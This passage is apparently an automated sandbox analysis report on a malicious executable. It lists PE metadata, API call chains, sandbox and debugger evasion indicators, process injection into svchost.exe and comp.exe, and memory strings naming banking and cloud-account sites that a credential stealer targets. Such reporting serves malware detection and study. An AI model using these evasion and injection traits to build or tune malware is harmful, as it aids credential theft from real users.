                Source: SpCuEoekPa.exe | Static file information: File size 1192448 > 1048576
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SpCuEoekPa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: comp.pdb source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OGbZSCDMTTWQqW.exe, 00000006.00000000.1602038469.000000000077E000.00000002.00000001.01000000.00000006.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1757528049.000000000077E000.00000002.00000001.01000000.00000006.sdmp
                Source: Binary string: comp.pdbGCTL source: svchost.exe, 00000003.00000003.1648152709.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681342325.0000000003200000.00000004.00000020.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000006.00000002.3151641989.0000000001108000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: SpCuEoekPa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SpCuEoekPa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SpCuEoekPa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SpCuEoekPa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SpCuEoekPa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00364B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_0036C4FE push A30036BAh; retn 0036h [0_2_0036C50D]
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_00388945 push ecx; ret [0_2_00388958]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418B23 pushad ; ret [3_2_00418CA0]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041183B push edi; iretd [3_2_0041183C]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004180FB pushfd ; retf [3_2_00418116]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041222A push cs; retf [3_2_0041222F]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004122B0 push ecx; retf [3_2_004122BD]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004122BF pushfd ; iretd [3_2_004122C0]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00403350 push eax; ret [3_2_00403352]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418C08 pushad ; ret [3_2_00418CA0]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00401552 pushfd ; ret [3_2_00401566]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408562 push edi; iretd [3_2_00408563]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408572 push esi; ret [3_2_00408573]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00414503 push FFFFFFB7h; iretd [3_2_00414516]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004165F1 push eax; iretd [3_2_00416603]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004015BB pushfd ; ret [3_2_00401566]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00413E7E push ss; retf [3_2_00413E81]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00408600 push ebp; iretd [3_2_00408601]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040175C pushfd ; ret [3_2_00401778]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418F7A push ecx; iretd [3_2_00418F81]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00424FC3 push edi; iretd [3_2_00424FCE]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038309AD push ecx; mov dword ptr [esp], ecx [3_2_038309B6]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_02F6225F pushad ; ret [7_2_02F627F9]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_02F627FA pushad ; ret [7_2_02F627F9]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_02F6283D push eax; iretd [7_2_02F62858]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_02F909AD push ecx; mov dword ptr [esp], ecx [7_2_02F909B6]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_02F61368 push eax; iretd [7_2_02F61369]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_006822A2 push FF5A8F7Dh; ret [7_2_006822AF]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_0067E4E8 push edi; iretd [7_2_0067E4E9]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_006909CB push ebx; retf [7_2_006909CC]
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_00680B2B push ss; retf [7_2_00680B2E]
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00383187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00383187
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\comp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | API/Special instruction interceptor: Address: 1671FF4
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\comp.exe | API/Special instruction interceptor: Address: 7FF8418CDA44
                Source: SpCuEoekPa.exe, 00000000.00000002.1311195776.0000000001726000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288401290.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288602537.0000000001726000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387096E rdtsc
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exe | API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 5780 | Thread sleep count: 39 > 30
                Source: C:\Windows\SysWOW64\comp.exe TID: 5780 | Thread sleep time: -78000s >= -30000s
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe TID: 6440 | Thread sleep time: -40000s >= -30000s
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe TID: 6440 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\comp.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CC6D1 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\comp.exe | Code function: 7_2_0068C420 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\SpCuEoekPa.exe | Code function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: 2-64-111.7.dr | Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 2-64-111.7.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 2-64-111.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 2-64-111.7.dr | Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ansaction PasswordVMware20,11696501413x
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ctiveuserers.comVMware20,11696501413}
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,
                Source: 2-64-111.7.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 2-64-111.7.dr | Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 2-64-111.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 2-64-111.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991808576.000001DC0383E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 2-64-111.7.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ropeVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sswords blocklistVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3152536802.000000000093F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 2-64-111.7.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n.utiitsl.comVMware20,11696501413h
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: agement pageVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: COM.HKVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 2-64-111.7.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,1169650t7
                Source: 2-64-111.7.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: entralVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 2-64-111.7.dr | Binary or memory string: global block list test formVMware20,11696501413
                Source: 2-64-111.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 2-64-111.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169650
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696501413>!
                Source: 2-64-111.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\comp.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E rdtsc 3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417743 LdrLoadDll,3_2_00417743
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D3F09 BlockInput,0_2_003D3F09
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00363B3A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00395A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00395A7C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00364B37 LoadLibraryA,GetProcAddress,0_2_00364B37
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_01672260 mov eax, dword ptr fs:[00000030h]0_2_01672260
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_016722C0 mov eax, dword ptr fs:[00000030h]0_2_016722C0
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_01670C40 mov eax, dword ptr fs:[00000030h]0_2_01670C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC3CD mov eax, dword ptr fs:[00000030h]3_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov ecx, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038663FF mov eax, dword ptr fs:[00000030h]3_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C310 mov ecx, dword ptr fs:[00000030h]3_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850310 mov ecx, dword ptr fs:[00000030h]3_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
